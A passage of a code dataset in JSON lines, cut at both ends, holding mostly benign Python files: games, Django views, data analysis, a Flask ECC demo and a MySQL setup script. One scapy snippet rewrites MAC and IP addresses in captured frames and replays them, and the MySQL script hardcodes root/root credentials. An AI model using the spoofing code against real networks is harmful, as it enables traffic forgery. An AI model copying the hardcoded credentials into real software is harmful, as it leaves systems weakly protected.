messagebox.showerror('ERROR','Invalid game code')\n return\n try:\n req = requests.post(f'{self.url}/join/')\n except:\n messagebox.showerror('Error', \"Game not found\")\n return\n if req.text != 'false':\n self.player_num = int(req.text)\n if self.player_num == 1:\n self.my_turn = True \n self.draw()\n self.update()\n else:\n messagebox.showerror('Game full','Game already full')\n\n def update(self):\n req = requests.get(f'{self.url}/get/')\n if json.loads(req.text)['tiles'] != self.tiles:\n self.tiles = json.loads(req.text)['tiles']\n self.game_data = json.loads(req.text)['game_data']\n if self.game_data['winner']:\n self.draw()\n messagebox.showinfo('Winner', 'You won!!' 
if self.game_data['winner'] == self.player_num else 'You lost..')\n if self.game_data['on_turn'] == self.player_num:\n self.my_turn = True\n self.draw()\n root.after(1000, self.update)\n\n def draw(self):\n clear_screen()\n\n if self.my_turn:\n Label(\n text=\"Your turn\",\n bg='green',\n fg='white',\n font='arial 15'\n ).grid()\n else:\n Label(\n text=\"Wait for your turn\",\n bg='red',\n fg='white',\n font='arial 15'\n ).grid()\n\n player_symbol = \"X\" if self.player_num == 1 else \"O\"\n\n Label(\n text=f\"Playing as: {player_symbol}\",\n font='arial 15'\n ).grid()\n\n field_frame = Frame()\n field_frame.grid()\n for y, row in enumerate(self.tiles):\n for x, tile in enumerate(row):\n btn_text = \"\"\n btn_color = \"white\" \n if tile == 1:\n btn_text = 'X'\n btn_color = \"red\"\n if tile == 2:\n btn_text = 'O'\n btn_color = \"blue\"\n Button(\n master=field_frame,\n text=btn_text,\n fg='white',\n bg=btn_color,\n width=3,\n font='arial 15',\n border=1\n ).grid(row=y, column=x)\n \n btn_frame = Frame()\n btn_frame.grid()\n\n for x in range(len(self.tiles)+1):\n Button(\n master=btn_frame,\n text=\"\\\\/\",\n font='arial 15',\n width=3,\n border=1,\n bg='black',\n fg='white',\n command= lambda column=x: self.do_turn(column)\n ).grid(row=0, column=x)\n\n #Button(\n # text=\"refresh\",\n # command= lambda: self.update()\n #).grid()\n\n\n def do_turn(self, column):\n if game.my_turn:\n data = {\"player\":self.player_num,\"column\":column}\n req = requests.post(f'{self.url}/user_move/', data=data)\n if req.text != 'false':\n self.my_turn = False\n self.update()\n\n def host_game(self):\n messagebox.showinfo(\"Hosting a game\",\"To host a game run the hoster script\")\n\nroot = Tk()\nroot.title(\"Four in a row\")\n\ngame = Game()\nroot.mainloop()","repo_name":"Donkere-vader/fourOnARowMultiplayer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37746937507","text":"\"\"\"\nSee\nhttps://github.com/NHSDigital/pytest-nhsd-apim/blob/main/tests/test_examples.py\nfor more ideas on how to test the authorization of your API.\n\"\"\"\nimport requests\nimport pytest\nimport os\nfrom lib import Assertions\nfrom lib import Generators\nfrom lib.constants import CORRELATION_IDS\n\nSANDBOX_URL = os.environ.get(\"SANDBOX_URL\")\n\n\n@pytest.mark.skip(reason=\"Sandbox tests are intermittently failing with 503 error\")\n@pytest.mark.parametrize(\"correlation_id\", CORRELATION_IDS)\ndef test_data_invalid(correlation_id):\n invalid_request_body = {\n \"query\": (\n \"query PublishedCohortLibraryGetBySlugName(urlSlug: $urlSlug) {\"\n \"... 
on Cohort {\"\n \"summary} }\"\n )\n }\n\n error_response = requests.post(\n f\"{SANDBOX_URL}/api\",\n headers=Generators.generate_target_server_headers(correlation_id), json=invalid_request_body\n )\n\n Assertions.assert_error_with_optional_correlation_id(\n error_response,\n 400,\n [{'message': 'An error occurred'}],\n correlation_id\n )\n","repo_name":"NHSDigital/caas-published-cohort-definitions","sub_path":"tests/sandbox_tests/test_sandbox_400_errors.py","file_name":"test_sandbox_400_errors.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"72861286650","text":"import pandas as pd\nimport numpy as np\nimport string, re, random\nimport itertools\n\npd.set_option('max_columns',200)\npd.set_option('display.max_colwidth', -1)\npd.set_option('max_rows',200)\n\n\n#---------Load all LV restaurant reviews\ndf = pd.read_pickle(\"./data/LVdf_restaurants.pkl\") #Loading pd dataframe with ALL LasVegas restaurants reviews\ndf.shape\ndf.head(1)\n\ndf = df.drop(columns=['user_id','attributes','hours','attributes_AcceptsInsurance',\\\n 'attributes_AgesAllowed','attributes_BusinessAcceptsBitcoin','attributes_DogsAllowed',\\\n 'attributes_HairSpecializesIn','attributes_CoatCheck','attributes_BusinessParking',\\\n 'attributes_BikeParking','attributes_ByAppointmentOnly'])\ndf['date'] = pd.to_datetime(df.date)\ndf.columns = df.columns.str.replace('attributes_','')\ndf.columns = df.columns.str.replace('Restaurants','')\ndf = df[df.is_open == 1]\n\ndf = df[df['review_count'] >= 25] #keep restaurants w/ > 25 reviews\nlist(df) #show column names\ndf.shape #874968 reviews total\n\ndf.to_pickle(\"./data/df_LVrestaurantsOpen25+.pkl\")\n\ndf_revsample = df.groupby('business_id').apply(lambda x: x.sample(25))\ndf_revsample.shape\n#df_revsample.to_pickle(\"./data/df_LVsampled25Reviews\")\ndf_revsample.business_id.unique().shape # 3020 unique businesses\ndf_revsample.name.unique().shape #2163 business names (3020 - 2163 = 857 with multiple locations?)\n\n#---------Repeat for Tips df: ###\n\ndf_tips = pd.read_pickle(\"./data/df_LVtips.pkl\") #Loading pd dataframe with ALL LasVegas restaurants tips\ndf_tips.shape\nlist(df_tips)\ndf_tips = df_tips.filter(['business_id','name','tip'])\ndf_tips.business_id.unique().shape\ndf_tips.to_pickle(\"./data/df_LVtips.pkl\")\n\ntip_count = df_tips.groupby(by=\"business_id\").count()\ntip_count = tip_count[tip_count['name']>=5]\ntip_count.shape\n","repo_name":"dezzibelle/Yelp_Recommender","sub_path":"Members/Erin/SampleReviews.py","file_name":"SampleReviews.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"30333480311","text":"from django_filters.rest_framework import DjangoFilterBackend\nfrom rest_framework import filters, mixins, permissions, status, viewsets\nfrom rest_framework.decorators import action\nfrom rest_framework.generics import get_object_or_404\nfrom rest_framework.response import Response\n\nfrom .filters import TagFilter, SearchIngredientFilter\nfrom .models import Ingredient, Recipe, Tag\nfrom .permissions import IsAuthenticatedForPostAndPatch\nfrom .serializers import (FavoriteSerializer, IngredientsSerializer,\n RecipesGetSerializer, RecipesPostSerializer,\n TagSerializer)\nfrom .utils import create_user_shopping_cart\n\n\nclass TagsViewSet(\n mixins.ListModelMixin,\n mixins.RetrieveModelMixin,\n viewsets.GenericViewSet\n):\n \"\"\"Обработка тегов для 
рецептов\"\"\"\n queryset = Tag.objects.all()\n serializer_class = TagSerializer\n pagination_class = None\n filter_backends = (DjangoFilterBackend,)\n filterset_fields = ('slug', 'name')\n\n\nclass RecipesViewSet(viewsets.ModelViewSet):\n \"\"\"Создание и обработка рецептов\"\"\"\n queryset = Recipe.objects.select_related('author').all()\n filter_backends = (DjangoFilterBackend, filters.OrderingFilter)\n filterset_class = TagFilter\n permission_classes = (IsAuthenticatedForPostAndPatch,)\n ordering = ('-pub_date',)\n\n def get_serializer_class(self):\n if self.request.method == 'GET':\n return RecipesGetSerializer\n return RecipesPostSerializer\n\n def get_queryset(self):\n qs = Recipe.objects\n if self.request.query_params.get('is_favorited'):\n qs = qs.filter(favorite__username=self.request.user)\n if self.request.query_params.get('is_in_shopping_cart'):\n qs = qs.filter(shopping_cart__username=self.request.user)\n return qs\n\n @action(\n methods=['post', 'delete'],\n detail=True,\n permission_classes=[permissions.IsAuthenticated]\n )\n def favorite(self, request, pk=None):\n \"\"\"Добавление рецептов в избранное\"\"\"\n recipe = get_object_or_404(Recipe, pk=pk)\n favorites = request.user.favorite_all.all()\n if request.method == 'POST':\n if recipe in favorites:\n return Response(\n 'Уже добавлено в избранное',\n status=status.HTTP_400_BAD_REQUEST\n )\n recipe.favorite.add(request.user)\n serializer = FavoriteSerializer(recipe)\n return Response(serializer.data)\n if recipe not in favorites:\n return Response(\n 'Такого рецепта нет в избранном!',\n status=status.HTTP_400_BAD_REQUEST\n )\n recipe.favorite.remove(request.user)\n return Response('Успешно удалено')\n\n @action(\n methods=['post', 'delete'],\n detail=True,\n permission_classes=[permissions.IsAuthenticated]\n )\n def shopping_cart(self, request, pk=None):\n \"\"\"Добавление рецептов в список покупок\"\"\"\n recipe = get_object_or_404(Recipe, pk=pk)\n shopping_cart = request.user.shopping_cart_all.all()\n if request.method == 'POST':\n serializer = FavoriteSerializer(recipe)\n if recipe in shopping_cart:\n return Response(\n 'Уже добавлено в список покупок!',\n status=status.HTTP_400_BAD_REQUEST\n )\n recipe.shopping_cart.add(request.user)\n return Response(serializer.data)\n if recipe not in shopping_cart:\n return Response('Такого рецепта нет в списке покупок!')\n recipe.shopping_cart.remove(request.user)\n return Response('Успешно удалено')\n\n @action(\n methods=['get'],\n detail=False,\n permission_classes=[permissions.IsAuthenticated]\n )\n def download_shopping_cart(self, request):\n \"\"\"Создание pdf.\"\"\"\n return create_user_shopping_cart(request)\n\n\nclass IngredientsViewSet(viewsets.ModelViewSet):\n \"\"\"Обработка ингредиентов\"\"\"\n queryset = Ingredient.objects.all()\n serializer_class = IngredientsSerializer\n filter_backends = (DjangoFilterBackend, SearchIngredientFilter)\n search_fields = ('^name', )\n pagination_class = None\n","repo_name":"StanislavRevolution/foodgram-project-react","sub_path":"backend/api_foodgram/recipes/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41994985395","text":"class Solution:\n def leftRightDifference(self, nums: List[int]) -> List[int]:\n left = [0]\n left_sum = 0\n right = [0]\n right_sum = 0\n arr = []\n for i in range(len(nums)-1):\n left_sum = left_sum + nums[i] \n left.append(left_sum)\n for j in range(len(nums)-1,0,-1):\n 
right_sum = right_sum + nums[j]\n right.append(right_sum)\n right = right[::-1]\n for k in range(len(nums)):\n arr.append(abs(left[k]-right[k]))\n return arr\n\n","repo_name":"Cherry-theCSStudent/Leetcode-Solutions","sub_path":"leftRightSumDiff.py","file_name":"leftRightSumDiff.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"35921691692","text":"# sorting using custom key\r\nemployees = [\r\n {'Name': 'Smit', 'age': 25, 'salary': 10000},\r\n {'Name': 'Tim', 'age': 30, 'salary': 80000},\r\n {'Name': 'Sarah', 'age': 18, 'salary': 10500},\r\n {'Name': 'Mike', 'age': 40, 'salary': 15000},\r\n{'Name': 'Apex', 'age': 25, 'salary': 10600},\r\n {'Name': 'Xie', 'age': 30, 'salary': 8020},\r\n {'Name': 'Lamburt', 'age': 18, 'salary': 11000},\r\n {'Name': 'Megha', 'age': 40, 'salary': 1500},\r\n{'Name': 'Musk', 'age': 25, 'salary': 10000},\r\n {'Name': 'Shady', 'age': 30, 'salary': 98000},\r\n {'Name': 'Mosh', 'age': 18, 'salary': 10500},\r\n {'Name': 'Mithali', 'age': 40, 'salary': 715000},\r\n{'Name': ' Turing', 'age': 25, 'salary': 107000},\r\n {'Name': ' Lin', 'age': 30, 'salary': 8000},\r\n {'Name': ' Hopkins', 'age': 18, 'salary': 91000},\r\n {'Name': 'Nikhil', 'age': 40, 'salary': 815000},\r\n{'Name': 'Alan', 'age': 25, 'salary': 10000},\r\n {'Name': 'Sharon', 'age': 30, 'salary': 88000},\r\n {'Name': 'John', 'age': 18, 'salary': 10200},\r\n {'Name': 'Devanshu', 'age': 40, 'salary': 315000},\r\n\r\n]\r\n\r\n# sort by name (Ascending order)\r\nemployees.sort(key=lambda x: x.get('Name'))\r\nprint(employees, end='\\n\\n')\r\n\r\n# sort by Age (Ascending order)\r\nemployees.sort(key=lambda x: x.get('age'))\r\nprint(employees, end='\\n\\n')\r\n\r\n# sort by salary (Descending order)\r\nemployees.sort(key=lambda x: x.get('salary'), reverse=True)\r\nprint(employees, end='\\n\\n')","repo_name":"smit-ux/Employee-Information-By-Sorting","sub_path":"sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"hi","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"30421830784","text":"\"\"\"\ndatabase_setup.py\n\nThis file contains a script to set up a MySQL database for storing dictionary data.\nIt establishes a connection to the database and creates the necessary tables,\nincluding \"Themes\", \"Notes\", and \"Settings\", with their respective fields.\n\nThe script utilizes the PyMySQL library for connecting to the MySQL server.\n\nAfter establishing the connection, the code executes CREATE TABLE statements\nto create the required tables. 
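# --- Editor's note (illustrative, not in the original): operator.itemgetter replaces
# the lambdas above, and tuple keys give multi-field sorts in one pass.
from operator import itemgetter

employees.sort(key=itemgetter('age'))  # same ordering as key=lambda x: x.get('age')
by_age_then_salary = sorted(employees, key=lambda x: (x['age'], -x['salary']))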
It also inserts initial data into the \"Settings\" table.\n\nNote: Before running this script, make sure you have installed the PyMySQL library\nand configured the MySQL server with the appropriate credentials and database.\n\nPlease modify the connection parameters (host, user, password, port, and database)\naccording to your MySQL server configuration.\n\"\"\"\n\nimport pymysql\n\n\ntry:\n    connection = pymysql.connect(\n        host=\"localhost\",\n        user=\"root\",\n        password=\"root\",\n        port=3306,\n        database=\"dictionary_db\",\n        cursorclass=pymysql.cursors.DictCursor,\n    )\n\n    try:\n        with connection.cursor() as cursor:\n            create_table_themes = (\n                \"CREATE TABLE Themes (\"\n                \"id INT(11) NOT NULL AUTO_INCREMENT,\"\n                \"theme VARCHAR(50) NOT NULL,\"\n                \"PRIMARY KEY (id)\"\n                \");\"\n            )\n            cursor.execute(create_table_themes)\n        with connection.cursor() as cursor:\n            create_table_notes = (\n                \"CREATE TABLE Notes(\"\n                \"id INT(11) NOT NULL AUTO_INCREMENT,\"\n                \"word VARCHAR(30) NOT NULL,\"\n                \"translate VARCHAR(30) NOT NULL,\"\n                \"themesid INT(11),\"\n                \"PRIMARY KEY (id),\"\n                \"FOREIGN KEY (themesid) REFERENCES Themes(id) \"\n                \");\"\n            )\n            cursor.execute(create_table_notes)\n        with connection.cursor() as cursor:\n            create_table_save_settings = (\n                \"CREATE TABLE Settings (\"\n                \"id INT(11) NOT NULL AUTO_INCREMENT,\"\n                \"theme VARCHAR(50),\"\n                \"verify BOOLEAN,\"\n                \"repetition BOOLEAN,\"\n                \"word BOOLEAN,\"\n                \"translate BOOLEAN,\"\n                \"randomly BOOLEAN,\"\n                \"successively BOOLEAN,\"\n                \"timer INT,\"\n                \"PRIMARY KEY (id)\"\n                \");\"\n            )\n            cursor.execute(create_table_save_settings)\n        with connection.cursor() as cursor:\n            main_save = (\n                \"INSERT INTO Settings (\"\n                \"theme, \"\n                \"verify,\"\n                \"repetition,\"\n                \"word,\"\n                \"translate,\"\n                \"randomly,\"\n                \"successively,\"\n                \"timer)\"\n                \"VALUES (%s, %s, %s, %s, %s, %s, %s, %s)\"\n            )\n            values = (\"List of themes\", True, False, True, False, True, False, 5)\n            cursor.execute(main_save, values)\n            connection.commit()\n        connection.commit()\n\n    finally:\n        connection.close()\n\nexcept pymysql.Error as error:\n    print(f\"Error executing CREATE query: {error}\")\n","repo_name":"OleksandHrynchak/Dictionary","sub_path":"Database/MySQL/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":3166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15403751778","text":"import _winreg\nfrom scapy.all import *\nfrom scapy.utils import rdpcap\n\n# Rewrite the layer-2/3 addresses of captured frames, then replay them\nsrc_mac = \"MAC_ADDR\"\ndst_mac = \"MAC_ADDR\"\ndst_ip = \"\"\nsrc_ip = \"\"\n\nframes = rdpcap(\"somepcapfile.pcap\")\nfor frame in frames:\n\ttry:\n\t\tframe[Ether].src = src_mac\n\t\tframe[Ether].dst = dst_mac\n\t\tif IP in frame:\n\t\t\tframe[IP].src = src_ip\n\t\t\tframe[IP].dst = dst_ip\n\t\tsendp(frame)\n\texcept Exception as e:\n\t\tprint(\"Error\", e)\n\n# CreateKey requires a sub_key argument; \"Software\" is only a placeholder here\nkeyName = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, \"Software\")","repo_name":"paddypopeye/Python_Security","sub_path":"SecurityPy3/PlayWinreg.py","file_name":"PlayWinreg.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42621483698","text":"from subprocess import run, PIPE\nimport os\nimport pathlib\nfrom typing import List\n\nfrom . 
import dotfiles, osx\n\n\ncode = osx.App(\n command='code',\n osx_name = 'Visual Studio Code.app',\n config_path = osx.CONFIG_DIR / 'Code/User',\n)\n\ncode_insiders = osx.App(\n command = 'code-insiders',\n osx_name = 'Visual Studio Code - Insiders.app',\n config_path = osx.CONFIG_DIR / 'Code - Insiders/User',\n)\n\nVSCODE_DOTFILES_PATH = dotfiles.repo_path()/'.config/Code/User'\n\n\ndef installed_extensions() -> List[str]:\n proc = run(['code', '--list-extensions'], stdout=PIPE)\n return proc.stdout.decode('utf-8').strip().split('\\n')\n\n\ndef extensions_from_dotfiles() -> List[str]:\n with open(dotfiles.repo_path()/'.config/vscode-extensions') as file:\n return file.read().strip().split('\\n')\n\n\ndef install_extension(app: osx.App, extension: str) -> None:\n proc = run([app.command, '--install-extension', extension], stdout=PIPE)\n stdout = proc.stdout.decode('utf-8').strip().split('\\n')\n print('\\n'.join(stdout[1:]))\n\n\ndef install_extensions_from_dotfiles(app: osx.App) -> None:\n print(f'Installing extensions for {app.osx_name} from dotfiles...')\n for extension in extensions_from_dotfiles():\n install_extension(app, extension)\n","repo_name":"dtgoitia/dotfiles-utils","sub_path":"utils/vscode.py","file_name":"vscode.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38038337089","text":"# Import necessary modules\nimport base64\nimport sys\nimport ecc\nfrom flask import Flask, request\n\n\n# This function provides a user interface to select the ECC parameters.\ndef select_ecc_params():\n # The loop continues until the user inputs a valid option.\n while True:\n # Present options for the type of ECC parameters to use.\n print(\"\\nSelect the kind of ECC parameters to use:\")\n print(\"1. Optimized by GA\")\n print(\"2. Optimized by PSO\")\n print(\"3. secp256k1\")\n print(\"4. brainpoolP256r1\")\n print(\"5. Exit the simulation\")\n option = input(\"\\nEnter the option (1 to 5): \")\n if option in [\"1\", \"2\", \"3\", \"4\"]:\n # If a valid option is selected, it is returned for further use.\n return option\n elif option == \"5\":\n # If option 5 is selected, the program is terminated.\n sys.exit(\"Exiting the simulation.\")\n else:\n # If the input is not valid, the user is prompted to input again.\n print(\"Incorrect option. 
Please enter a number between 1 and 5.\")\n\n\n# Application Initialization\napp = Flask(__name__) # Create a new Flask application\nchosen_params = select_ecc_params() # Type of ECC parameters to be used chosen by the user\nparams = ecc.initialize_params(chosen_params) # Initialize ECC parameters by calling select_ecc_params function that allows the user to choose the ECC parameters they want to use.\nprivate_key = ecc.generate_private_key(params) # Generate the private key for the elliptic curve cryptography\npublic_key = ecc.generate_public_key(private_key, params) # Generate the corresponding public key\nprivate_key_ecdh_B = ecc.generate_private_key(params) # Generate a private key for ECDH (Elliptic-curve Diffie-Hellman) protocol in Entity B Server (simulated ERP), used for secure key exchange\npublic_key_ecdh_B = ecc.generate_public_key(private_key_ecdh_B, params) # Generate the corresponding public key for ECDH (Elliptic-curve Diffie-Hellman) protocol in Entity B, used for secure key exchange\nhmac_key = None # Initialize HMAC (Hash-based Message Authentication Code) key to None\nmessage_counter = 0 # Initialize the counter for the received messages\n\n\n# Route handlers\n\n# This route handles POST requests sent to the '/order' endpoint\n@app.route('/order', methods=['POST'])\ndef decrypt_endpoint():\n global message_counter, hmac_key # Declare global variables to update them within this function\n\n # Extract the JSON data from the incoming HTTP POST request from Entity A (emulated e-commerce)\n data = request.get_json()\n\n # Decrypt the message and verify the HMAC\n is_hmac_valid, decrypted_message = decrypt_order_message(data)\n\n # If HMAC verification fails, return an error message to the sender Entity A (emulated e-commerce)\n if not is_hmac_valid:\n return {\"status\": \"error\", \"message\": \"HMAC verification failed\"}\n\n # If HMAC verification succeeds, increment the message counter and print the transaction details\n message_counter += 1\n print(f\"\\n\\nTransaction {message_counter}:\")\n print(f\"Encrypted message: {data['encrypted_message']}\")\n\n if decrypted_message is None:\n print(\"Decryption failed.\")\n else:\n print(f\"Decrypted message: {decrypted_message}\")\n\n # Return a success status response to the sender Entity A (emulated e-commerce)\n return {'status': 'success'}\n\n# This route handles GET requests sent to the '/public-key' endpoint and returns the public key to Entity A (emulated e-commerce)\n@app.route('/public-key', methods=['GET'])\ndef public_key_endpoint():\n return {\"public_key\": {\"x\": public_key.x, \"y\": public_key.y}}\n\n# This route handles GET requests sent to the '/public-key-ecdh' endpoint and returns the ECDH public key\n@app.route('/public-key-ecdh', methods=['GET'])\ndef public_key_ecdh_endpoint():\n return {\"public_key_ecdh\": {\"x\": public_key_ecdh_B.x, \"y\": public_key_ecdh_B.y}}\n\n# This route handles GET requests sent to the '/get-params' endpoint and returns the selected option for ECC parameters.\n # 1. Optimized by GA\n # 2. Optimized by PSO\n # 3. secp256k1\n # 4. 
brainpoolP256r1\n@app.route('/get-params', methods=['GET'])\ndef get_params_endpoint():\n return {\"params\": chosen_params}\n\n# Helper Functions\ndef decrypt_order_message(data):\n \"\"\"\n This function handles the decryption of the order message and the validation of its HMAC.\n Args:\n data (dict): The incoming order data that contains the encrypted message from Entity A (emulated e-commerce), HMAC, and keys.\n Returns:\n is_hmac_valid (bool): A flag indicating whether the HMAC validation was successful.\n decrypted_message (str): The decrypted message content.\n \"\"\"\n\n global hmac_key # Define hmac_key as global so it can be accessed outside this function\n\n # Extract the first part of the encrypted message from the incoming data and convert it to an ECPoint\n C1_data = data['C1']\n C1 = ecc.ECPoint(int(C1_data['x']), int(C1_data['y']))\n\n # Extract the encrypted message from the incoming data\n encrypted_message = data['encrypted_message']\n\n # Extract and decode the HMAC from the incoming data\n received_hmac = base64.b64decode(data['hmac'])\n\n # Decrypt the message using our ECC private key and the first part of the encrypted message\n try:\n decrypted_message = ecc.decrypt_message(C1, encrypted_message, private_key, params)\n except Exception as e:\n print(f\"An error occurred during decryption: {str(e)}\")\n decrypted_message = None\n\n\n # Extract Entity A's ECDH public key from the incoming data (emulated e-commerce) and convert it to an ECPoint\n public_key_ecdh_A = ecc.ECPoint(data['public_key_ecdh_A']['x'], data['public_key_ecdh_A']['y'])\n\n # Compute the shared secret by performing scalar multiplication between Entity A's ECDH public key and Entity B's ECDH private key\n shared_secret = ecc.ec_scalar_multiplication(public_key_ecdh_A, private_key_ecdh_B, params)\n\n # Convert the x-coordinate of the shared secret to bytes and use it as the HMAC key\n hmac_key = str(shared_secret.x).encode('utf-8')\n\n # Verify the received HMAC using the computed HMAC key, decrypted message and the received HMAC\n is_hmac_valid = ecc.verify_hmac(hmac_key, decrypted_message, received_hmac)\n\n # Print a success message if the HMAC verification is valid, otherwise print a failure message\n if is_hmac_valid:\n print(\"HMAC verification succeeded.\")\n else:\n print(\"HMAC verification failed.\")\n \n # Return the results of the HMAC verification and the decrypted message\n return is_hmac_valid, decrypted_message\n\n\n\n# Run the server\nif __name__ == \"__main__\":\n app.run(host='localhost', port=5000)\n","repo_name":"cftellezc/GA_PSO_ECC_parameter_Optimization","sub_path":"e-commerce_simulation/entityB.py","file_name":"entityB.py","file_ext":"py","file_size_in_byte":6775,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"36933252745","text":"import cv2\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom skimage.feature import greycomatrix, greycoprops\r\nimport sys\r\nfrom skimage import io\r\nimport pandas as pd\r\nimport glob\r\nfrom openpyxl import load_workbook\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom PIL import Image \r\nimport os\r\n\r\n\r\ndef DataImage():\r\n base_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)))\r\n files_dir = os.path.abspath(os.path.join(base_dir, '../file_name.jpg'))\r\n image = plt.imread(files_dir)\r\n return(image)\r\n\r\ndef DataExcel():\r\n base_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)))\r\n files_dir = 
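# --- Editor's sketch (hypothetical, not part of the original): what ecc.verify_hmac
# plausibly does with only the standard library, assuming SHA-256 HMACs.
# hmac.compare_digest gives a constant-time comparison, avoiding timing side channels.
import hashlib
import hmac as std_hmac

def verify_hmac_stdlib(key: bytes, message: str, received_mac: bytes) -> bool:
    expected = std_hmac.new(key, message.encode("utf-8"), hashlib.sha256).digest()
    return std_hmac.compare_digest(expected, received_mac)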
os.path.abspath(os.path.join(base_dir, '../data.xlsx'))\r\n\r\n dataset = pd.read_excel (files_dir)\r\n fitur = dataset.iloc[:, :6].values\r\n kelas = dataset.iloc[:, 6].values\r\n \r\n data = {\r\n 'dataset' : dataset,\r\n 'fitur' : fitur,\r\n 'kelas' : kelas,\r\n }\r\n\r\n return(data)\r\n\r\ndef Crop (image):\r\n new_width = 700\r\n new_height = 700\r\n height, width, depth = image.shape # Get dimensions\r\n\r\n startx = width//2-(new_width//2)\r\n starty = height//2-(new_height//2) \r\n crop = image[starty:starty+new_height,startx:startx+new_width]\r\n return (crop)\r\n\r\ndef Rgb2Gray(crop):\r\n gray = crop[:,:,0]\r\n return(gray)\r\n\r\ndef Glcm(gray):\r\n glcm = greycomatrix(gray, [1], [0], symmetric = True, normed = True )\r\n contrast = greycoprops(glcm, 'contrast')\r\n dissimilarityraster = greycoprops(glcm, 'dissimilarity')\r\n homogeneityraster = greycoprops(glcm, 'homogeneity')\r\n energyraster = greycoprops(glcm, 'energy')\r\n correlationraster = greycoprops(glcm, 'correlation')\r\n ASMraster = greycoprops(glcm, 'ASM')\r\n\r\n glcm = {\r\n 'contrast' : contrast[0,0],\r\n 'dissimilarityraster' : dissimilarityraster[0,0],\r\n 'homogeneityraster' : homogeneityraster[0,0],\r\n 'energyraster' : energyraster[0,0],\r\n 'correlationraster' : correlationraster[0,0],\r\n 'ASMraster' : ASMraster[0,0],\r\n }\r\n\r\n return glcm\r\n\r\ndef Knn(data_train, data_test, kelas_train, k_value):\r\n classifier = KNeighborsClassifier(n_neighbors=k_value)\r\n classifier.fit(data_train, kelas_train)\r\n\r\n kelas_prediksi = classifier.predict(data_test)\r\n \r\n knn = kelas_prediksi\r\n\r\n return(knn)\r\n\r\ndef Run():\r\n # image = Data(\"grade1 (1).png\")\r\n\r\n image = DataImage()\r\n excel = DataExcel()\r\n\r\n crop = Crop(image)\r\n gray = Rgb2Gray(crop)\r\n glcm = Glcm(gray)\r\n \r\n data_train = [\r\n glcm['contrast'],\r\n glcm['dissimilarityraster'],\r\n glcm['homogeneityraster'],\r\n glcm['energyraster'],\r\n glcm['correlationraster'],\r\n glcm['ASMraster']\r\n ]\r\n data_train = [data_train]\r\n # print(excel['fitur'], data_train, excel['kelas'])\r\n # sys.exit()\r\n knn = Knn(excel['fitur'], data_train, excel['kelas'], 7)\r\n print(knn)\r\n\r\n return(knn)","repo_name":"luthfidhani/Klasifikasi-Daging-Sapi-PKL","sub_path":"Klasifikasi_daging_sapi - Backend/belajar_django/proses backup.py","file_name":"proses backup.py","file_ext":"py","file_size_in_byte":2959,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"40067366360","text":"\n\"\"\"\nAssignment1: Code Part 4\nby Adelbert Choi\n\nThis script aims to implement topic modeling on the twitter data obtained\n\"\"\"\n\nimport math\nimport numpy as np\n\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.decomposition import LatentDirichletAllocation\nfrom numpy.random import seed\nfrom wordcloud import WordCloud\nfrom ggplot import *\n\nimport SentimentAnalysis as sa\nimport tweetProcessor as tp\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n\n\ndef main():\n \"\"\"\n This method runs topic modelling through LDA.\n Note: code adapted from Lecturer Jeffrey Chan\n\n :return:\n \"\"\"\n # tweets json filename\n jsonFilename = \"uberTweetsUS.json\"\n\n # returns tweetTokens and tweetDates\n tweets = tp.getTweetDf(jsonFilename, type=\"topic\", removeFreqWords=True)\n\n\n featureNum = 250 # this is the number of features/words to used to describe our documents\n wordNumToDisplay = 20 # number of words to display for each topic\n topicNum = 3 # number 
of topics to be created\n\n # Count Vectorizer\n tfVectorizer = CountVectorizer(max_df=0.95, min_df=10, max_features=featureNum, lowercase=False, stop_words=None)\n # Create a term document matrix\n tf = tfVectorizer.fit_transform(tweets[\"tweetTokens\"])\n\n # Extract the names of the features - words\n tfFeatureNames = tfVectorizer.get_feature_names()\n\n # Set seed to allow reproducibility of results\n seed(7777)\n # Implement topic modeling using LDA\n ldaModel = LatentDirichletAllocation(n_components=topicNum, max_iter=10, learning_method='online').fit(tf)\n\n # Print out topics\n display_topics(ldaModel, tfFeatureNames, wordNumToDisplay)\n\n\n ### The following set of codes were adapted from https://www.machinelearningplus.com/nlp/topic-modeling-python-sklearn-examples/\n # The codes below aims to assign a topic to each tweet based on the constructed topic model\n # also the overall topic distribution is also obtained\n\n # Obtain ldaModel output\n lda_output = ldaModel.transform(tf)\n\n topicNames = [\"Topic\" + str(i) for i in range(topicNum)] # topic names e.g., Topic 0, 1, ..\n tweetNames = [\"Tweet\" + str(i) for i in range(len(tweets[\"tweetTokens\"]))] # tweet names e.g., Tweet 0, 1, ..\n\n # Make a pandas dataframe\n # this dataframe has assigned probabilities that a certain tweet is topic, 0, 1, or 2\n 